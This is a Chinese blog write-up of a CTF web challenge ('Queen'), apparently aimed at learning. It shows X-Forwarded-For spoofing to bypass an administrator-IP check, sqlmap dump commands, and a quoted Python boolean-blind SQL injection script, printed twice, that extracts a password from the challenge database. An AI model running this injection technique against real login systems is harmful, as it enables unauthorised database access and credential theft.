青少年CTF-qsnctf-Web-Queen

最新推荐文章于 2024-07-27 12:20:46 发布
最新推荐文章于 2024-07-27 12:20:46 发布
阅读量604 收藏 9
点赞数 20
分类专栏: CTF做题笔记 文章标签: 网络安全 web安全 ctf SQL注入 Linux sqlmap python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73734159/article/details/135112428
版权

题目环境:
image.png

题目难度:★★
题目描述:Q的系统会不会有漏洞?

image.png

看到了登录窗口,使用burp suite工具进行抓包

burp suite抓包

admin
1

image.png
Repeater重放
image.png
Send放包
image.png

Your IP is not the administrator’s IP address!
您的IP不是管理员的IP地址!

添加管理员IP

X-Forwarded-For:127.0.0.1

image.png

发现加密字符串

dXNlcjphZG1pbnxwYXNzOjE%3D
根据做题经验不难看出是base64编码

解密加密内容
echo "dXNlcjphZG1pbnxwYXNzOjE%3D" | base64 -d
image.png

输入的账号和密码被加密
猜测此题目涉及SQL注入

使用sqlmap工具梭一把

使用sqlmap工具
image.png

将抓包数据内容复制下来放到一个文本文件当中
注意是加X-Forwarded-For请求头的那个数据包

image.png

这里我创建了一个名为flag.txt的文本文件
并将数据包内容粘贴到了其中

sqlmap -l 一把梭
sqlmap -l flag.txt --batch --dbs 

-l 从Burp或WebScarab代理日志中解析目标
--batch 可以理解为全自动化 自动选择yes
--dbs 列出所有的数据库

在root终端中运行此命令!
image.pngsqlmap -r /home/kali/桌面/flag.txt -D sql --dump

-r 加载文件中的HTTP请求(本地保存的请求包txt文件)
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
–dbs 列出所有的数据库
–batch 自动选择yes
–tables 列出当前的表
–columns 列出当前的列
–dump 获取字段中的数据

这里怀疑题改了
之前可以用sqlmap跑出来
现在跑不出来了

使用python盲注脚本进行爆破

#某大佬的脚本
'''
 # @Author: St1ck4r
 # @Date: 2022-11-16 09:12:20
 # @LastEditors: St1ck4r
 # @LastEditTime: 2022-11-17 10:36:03
 # @link: https://www.st1ck4r.top
'''

import requests
import base64

url = "{此处填写url地址}/check.php?data="
flag=""
data=""
header={"X-Forwarded-For":"127.0.0.1"}

# payload = "(select group_concat(table_name) from information_schema.`TABLES` where table_schema = database())"
# payload = "(select group_concat(column_name) from information_schema.`COLUMNS` where table_name='user')"
payload = "(select  group_concat(password) from user where username=\"flag\")"

for i in range(100):
    low = 32
    high = 128
    mid = (low+high)//2
    while low < high:
        data = "user:admin' and ascii(substr({},{},1))<{} -- |pass:admin".format(payload,str(i+1),str(mid))
        data=base64.b64encode(data.encode()).decode()
        new_url = url + data
        # print(new_url)                               
        res = requests.get(new_url,headers=header)

        if("登陆成功!但是你登陆成功我也不会给你Flag" in res.text):
            high = mid
        else:
            low = mid + 1
        mid=(low+high)//2

    if mid <= 32 or mid >= 127:
        break
    flag += chr(mid-1)
# print(flag)
print(flag)


#某大佬的脚本
'''
 # @Author: St1ck4r
 # @Date: 2022-11-16 09:12:20
 # @LastEditors: St1ck4r
 # @LastEditTime: 2022-11-17 10:36:03
 # @link: https://www.st1ck4r.top
'''

import requests
import base64

url = "http://e460e3b7-ea11-46b9-a14a-6f68788be430.challenge.qsnctf.com:8081/check.php?data="
flag=""
data=""
header={"X-Forwarded-For":"127.0.0.1"}

# payload = "(select group_concat(table_name) from information_schema.`TABLES` where table_schema = database())"
# payload = "(select group_concat(column_name) from information_schema.`COLUMNS` where table_name='user')"
payload = "(select  group_concat(password) from user where username=\"flag\")"

for i in range(100):
    low = 32
    high = 128
    mid = (low+high)//2
    while low < high:
        data = "user:admin' and ascii(substr({},{},1))<{} -- |pass:admin".format(payload,str(i+1),str(mid))
        data=base64.b64encode(data.encode()).decode()
        new_url = url + data
        # print(new_url)
        res = requests.get(new_url,headers=header)

        if("登陆成功!但是你登陆成功我也不会给你Flag" in res.text):
            high = mid
        else:
            low = mid + 1
        mid=(low+high)//2

    if mid <= 32 or mid >= 127:
        break
    flag += chr(mid-1)
# print(flag)
print(flag)

image.png
得到flag:
**qsnctf{b487c107-4130-466b-acd7-7c6484729eb4}**

白猫a~
关注
  • 20
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
青少年CTF-A1-Misc-MC大挑战01
m0_74866126的博客
11-17 360
在网上冲浪没找到这题的答案,无奈只有自己试试了,花了很多的时间对压缩包解压的文件进行搜索flag痕迹,但是没有有用的线索,所以做这个可不是直接能从出题人给的文件里找到flag。
2024青少年ctf擂台挑战赛round1-Easy_SQLi
weixin_71656576的博客
03-01 682
接下来可以开始注入了,这个跟最简单的sql注入不一样,没有数据回显,我就用我比较熟悉的布尔盲注开始爆破了。我爆破出来了有三个列,id,username,password。不要在意端口,补wp的时候容器到时了,重新开了一个。写了个py的脚本爆破password的数据。发现没有回显数据,只有这种报错相关的提示。可以直接开始爆破列,手工爆破就用二分法。猜测flag是在password里。登录界面,随便输个1,1。不管三七二十一,开始爆破。
青少年CTF-WEB-Queen
m0_63047884的博客
11-22 1162
先抓包这个页面,然后再头部信息里面添加X-Forwarded-For:127.0.0.1。再次发送发现有回显页面,data后面是一串base64加密的值,先解密看一下。解密之后发现是将用户名和密码加密了,想到有可能是sql注入。提交完显示不是管理员的ip,这里想到用xff绕过。然后直接爆它的sql数据库就可以看到flag了。右键将login.php页面复制到文件。用sqlmap -l 跑就可以了。用户名密码随便输入,点击提交。打开环境,是一个网页登录界面。
青少年CTF擂台挑战赛 2024 #Round 1
weixin_70928309的博客
04-16 740
最后发现这么一堆,好样的,上网搜了一下,emmm,eval钩子,直接eval换成echo就可,然后解出来是这么个反序列化呜呜呜,又是反序列化。Vs加python跑傻了,两台kali都跑错了,哎,蚌埠住了,跑了一个小时。这,不是,我为什么回到了一年之前做题,一个时间盲注脚本即可跑出来。题目显示xxe漏洞,还给了版本号,直接搜一下,啊,公开wp?看出来后面三个是iife,根据我所知道的英文,直接猜life。解出情况中写了题目名称后面真的不想写了,累死了,第一层,我直接010打开,然后熟悉的base系列。
青少年CTF-qsnctf-A1-Misc-签到
m0_73734159的博客
12-23 422
题目描述:有没有可能,这个平台就是个题目?
青少年CTF-Misc-1
weixin_53226786的博客
07-02 897
然后把能尝试的操作都操作了一编,然后思考很久想起来了,jpg图片文件可以通过steghide工具,然后这下面又多了一串,尝试用steghide进行解密得到flag。用010editor发现文件尾越看越奇怪,然后看上面grep过滤出来的数据,难不成是原本是flag.zip被倒叙了变成了piz.flag,010查看,发现有伪加密,而且还多了个文件头,直接把上面文件头删除,就可解压。tysec{mealibertasmeuscanor}得到一堆2d2d的数据,根据提示,猜测是摩斯和培根密码,尝试解密。
青少年CTF-qsnctf-Web-登陆试试
m0_73734159的博客
12-21 550
题目描述:Syclover用户忘了他的密码,咋办哦,依稀记得密码为6位数字,以774开头,这次我们来爆爆他的密码,让他再也不犯相同的错了。找到与其它不同的Length这个就是得到的正确密码。只有爆破的时候才会对输入数据进行MD5值加密。看看源码里面有没有其它有用的信息。这样还不行需要对MD5值进行解密。索性猜测正确密码在最后边。628条数据仍未爆出。
青少年CTF-文章管理系统
CTF
03-08 602
打开容器后发现好像是sql注入类的问题,先尝试查找注入点发现出现的flag的值竟然是错误的值。再查找带有flag的文件名,先用sqlmap跑一下,
青少年CTF-qsnctf-Web-eval
m0_73734159的博客
12-21 461
题目描述:Eval是个什么呢,flag格式为:qsnctf{xxx}。system是外部命令执行函数。做道末心师傅出的题啦😉。发现了flag的存在!
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8354
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【论文速读】| MoRSE:利用检索增强生成技术填补网络安全专业知识的空白
m0_73736695的博客
07-25 521
本文介绍了MoRSE(Mixture of RAGs Security Experts),这是首个专为网络安全设计的AI聊天机器人。MoRSE利用两个并行工作的RAG(检索增强生成)系统,从多维网络安全背景中检索并组织信息。
网络安全相关竞赛比赛
黑战士的博客
07-18 1309
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
OWASP ZAP:一款功能强大的开源Web安全扫描工具
Coder加油站的专栏
07-27 852
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
最新发布
qq_64603703的博客
07-27 1002
详细解说数据分析pandas库中的常用方法
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值